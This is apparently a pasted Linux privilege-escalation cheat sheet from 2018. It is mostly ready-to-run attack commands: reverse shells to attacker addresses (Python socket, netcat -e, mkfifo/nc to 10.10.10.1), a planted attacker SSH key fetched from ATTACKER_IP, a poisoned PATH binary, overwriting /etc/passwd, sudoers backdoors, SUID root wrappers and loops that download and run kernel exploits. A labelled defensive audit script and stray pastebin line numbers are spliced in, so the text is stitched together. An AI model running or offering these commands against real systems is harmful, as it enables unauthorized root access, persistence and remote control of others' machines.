mathio3

Linux elevation of privileges

Aug 8th, 2018
* Post exploitation
#mathio.DZ
#+213{E0FDDAE2E60E040C2BC259EC8F8FC02CA22FB801363D3611BD83FB0934A3FE43B7738128F8513F3658B4F13FAE86BE4B7F4B140341FE08948EE20A516F620850 }
Shell Spawning

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh

Upgrade to a proper TTY: <Ctrl-Z>, then stty raw -echo; fg; reset

Set PATH, TERM and SHELL if missing:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash
alias ls='ls -alt --block-size=M'
alias fh='find . |grep'

Add public key to authorized keys:

$ wget -qO- https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys


* Escaping limited interpreters

Some payloads to overcome limited shells:

$ ssh user@$ip nc $localip 4444 -e /bin/sh
    enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

$ echo os.system('/bin/bash')

$ /bin/sh -i

$ exec "/bin/sh";

$ perl -e 'exec "/bin/sh";'

From within tcpdump

$ echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

From busybox

$ /bin/busybox telnetd -l /bin/sh -p 9999

:!bash
:set shell=/bin/bash:shell
!bash
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
awk 'BEGIN {system("/bin/bash")}'
--interactive
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'


Linux elevation of privileges, manual testing
Things to look for: misconfigured services (cron jobs), incorrect file permissions (exportfs, sudo), misconfigured environment ($PATH), binaries with the SUID bit set, software or OS with known vulnerabilities.

First try simple sudo:

$ sudo su -

What can we run with sudo?

$ sudo -l

Try su as every user, using the username as the password.

What services are running as root?

$ ps aux | grep root

Look for vulnerable/privileged components such as: mysql, sudo, udev, python

If /etc/exports is writable, you can add an NFS entry or change an existing entry, adding the no_root_squash flag to a root directory, place a binary with the SUID bit set, and get root.

If there is a cron job that runs as root but its script has incorrect file permissions, you can change it to run your SUID binary and get a shell.

The following command lists processes running as root, the permissions of their binaries, and NFS exports.

$ echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

Use netstat to find other connected machines:

$ netstat -ano

Alias to skip comments and empty lines in config files:

$ alias nonempty="egrep -v '^[ \t]*#|^$'"

If MySQL is running as root, you can run commands using sys_exec(). For instance, to add a user to sudoers (via the admin group):

sys_exec('usermod -a -G admin username')

More about mysql:

https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

Find Linux distribution and version

$ cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;

Architecture

$ cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release

Environment variables

$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set

Find printers

$ lpstat -a

Find installed apps:

$ ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archives; ls -alh /var/cache/yum/*;

Find writable configuration files

$ find /etc/ -writable -type f 2>/dev/null

Misconfigured services

$ cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Scheduled jobs

$ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny

Grep for hardcoded passwords

$ grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'

If in a web server's web root:

$ grep "localhost" ./ -R

Network configuration

$ /sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/networks; iptables -L; hostname; dnsdomainname

List other users' home directories

$ ls -ahlR /root/; ls -ahlR /home/

User bash history

$ cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history

User mails

$ cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root

Find interesting binaries

$ find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp

Mounted filesystems

$ mount; df -h; cat /etc/fstab

Look for binaries with the SUID or SGID bits set.

$ find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
$ find / -perm -1000 -type d 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null

Adding a binary to PATH, to hijack a SUID binary that invokes it without the fully qualified path. With an exported bash function the same can work even for a fully qualified call:

$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
    It works

If you can only change PATH, the following adds a poisoned ssh binary:

export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x /tmp/ssh

SUID C wrapper that spawns /bin/bash

#define _GNU_SOURCE
#include <stdlib.h>     /* system() */
#include <unistd.h>     /* setresuid() */

int main(void){
    setresuid(0, 0, 0);   /* real, effective and saved uid all set to root */
    system("/bin/bash");
    return 0;
}

Without an interactive shell, write the source with echo:

$ echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c

If you can get root to execute anything, the following changes a binary's owner to root and sets the SUID flag:

$ chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;

If /etc/passwd has incorrect permissions, you can become root:

$ echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su

Add user www-data to sudoers with no password:

$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

If you can sudo chmod:

$ echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
$ gcc setuid.c -o /tmp/setuid
$ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid

Wildcard injection: if a cron job uses a wildcard on its command line, you can create a file whose name will be passed as an argument to the cron task. For more info:

https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562

Compiling an exploit, fixing a linker error:

$ gcc 9545.c -o 9545 -Wl,--hash-style=both

Find other users on the system:

$ id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l

World-readable/writable files:

$ echo "world-writable folders"; find / -writable -type d 2>/dev/null; echo "world-writable folders (perm -222)"; find / -perm -222 -type d 2>/dev/null; echo "world-writable folders (other=w)"; find / -perm -o=w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o=x -type d 2>/dev/null; echo "world-writable & executable folders"; find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null;

Find world-writable directories without the sticky bit:

$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

Find files with no valid owner or group:

$ find /dir -xdev \( -nouser -o -nogroup \) -print
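As an added example (not part of the original paste), the misconfigurations the checks above hunt for, written up as a defender's audit script: exports entries with no_root_squash, world-writable files under /etc, set-uid/set-gid binaries to diff against a baseline, and cron files with bad ownership or permissions. The function names and the tree-root argument are my own; it relies on GNU find and needs root for complete results on a live system.

```shell
#!/bin/sh
# Added audit helpers, not from the original paste. Each function takes the
# path to inspect as an argument so it runs against a test tree as well as a
# live system; run as root with "/" for complete results.

# Exports entries that disable root squashing: a client's root keeps uid 0 on
# the share, which is what lets a planted SUID binary become root. Prints
# "line:entry" per hit, skips comment lines, prints nothing when clean.
exports_without_root_squash() {
    grep -n 'no_root_squash' "$1" 2>/dev/null \
        | grep -v '^[0-9]*:[[:space:]]*#' || true
}

# Regular files under a directory that any user may write to (the cron
# scripts and config files the checks above look for).
world_writable_files() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# Set-uid or set-gid files under a directory; save this output at build time
# and diff later runs against it to spot newly planted binaries.
setid_binaries() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# A cron file is acceptable when it is a regular file owned by the expected
# user (root unless $2 says otherwise) and neither group- nor world-writable.
# Returns 0 when acceptable, 1 otherwise. (-perm /mode is GNU find syntax.)
cron_file_ok() {
    [ -n "$(find "$1" -maxdepth 0 -type f -user "${2:-root}" \
              ! -perm /022 -print 2>/dev/null)" ]
}

# Full report over a tree rooted at $1 (normally /).
audit_report() {
    echo "== exports entries without root_squash"
    exports_without_root_squash "$1/etc/exports"
    echo "== world-writable files under $1/etc"
    world_writable_files "$1/etc"
    echo "== set-uid/set-gid files under $1/usr and $1/bin"
    setid_binaries "$1/usr"; setid_binaries "$1/bin"
    echo "== cron files with bad owner or permissions"
    for f in "$1"/etc/crontab "$1"/etc/cron.d/* "$1"/etc/cron.daily/*; do
        if [ -e "$f" ] && ! cron_file_ok "$f"; then echo "$f"; fi
    done
}

# Run the report only when a root directory is given, e.g.: sh audit.sh /
if [ -n "${1:-}" ]; then audit_report "$1"; fi
```

Save the set-uid/set-gid list from a freshly built host and compare later runs against it; a new entry under /tmp or a user's home is exactly the artifact the SUID tricks in this paste leave behind.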
  257.  
  258. Add user to sudoers in python.
  259.  
  260. #!/usr/bin/env python
  261. import os
  262. import sys
  263. try:
  264.         os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
  265. except:
  266.         sys.exit()
  267.  
  268. Ring0 kernel exploit for 2.3/2.4
  269.  
  270. wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
  271.  
  272. Inspect web traffic
  273.  
  274. $ tcpdump tcp port 80 -w output.pcap -i eth0
  275.  
  276.  
  277. Scripts to run
  278.  
  279. The following script runs exploit suggester and automatically downloads and executes suggested exploits:
  280.  
  281. https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
  282.  
  283. wget http://www.securitysift.com/download/linuxprivchecker.py
  284.  
  285. wget https://github.com/pentestmonkey/unix-privesc-check
  286.  
  287. Other scripts:
  288.  
  289. wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
  290.  
  291. wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
  292.  
  293. wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
  294.  
  295. wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
  296.  
  297. wget  https://www.rebootuser.com/?p=1758
  298.  
Exploits worth running

CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

https://www.exploit-db.com/exploits/15285/

Linux Kernel <= 2.6.37 'Full-Nelson.c'

https://www.exploit-db.com/exploits/15704/

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

https://git.zx2c4.com/CVE-2012-0056/about/

Linux CVE-2012-0056

wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

https://dirtycow.ninja/

Compile Dirty Cow:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

Cross compiling exploits

$ gcc -m32 -o output32 hello.c # (32 bit)
$ gcc -m64 -o output hello.c # (64 bit)

Linux 2.6.32

https://www.exploit-db.com/exploits/15285/

Open an xterm remotely

First, run an X server on your machine:

$ Xnest :1

Then, bind it to xterm, again on your machine:

$ xterm -display 127.0.0.1:1

Finally, run the following on the remote machine:

$ /usr/openwin/bin/xterm -display yourip:1

Get proof

$ echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "

Elevation in 2.6.x:

$ for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done

Source: https://guif.re/linuxeop
#mathio